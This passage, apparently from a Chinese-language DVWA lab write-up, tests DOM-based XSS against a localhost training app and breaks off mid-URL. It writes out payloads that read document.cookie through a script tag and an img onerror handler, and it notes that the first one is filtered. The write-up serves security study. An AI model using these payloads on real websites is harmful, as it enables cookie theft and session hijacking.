随便在选项里选一个,url中会出现我们选的哪个。
看看可不可以用<script>alert(document.cookie)</script>
127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=<script>alert(document.cookie)</script>
发现不会执行,而且语句也没有在url中显示,只显示English应该是过滤了
方法一
换一个试一下<img src=1 onerror=(document.cookie)>
127.0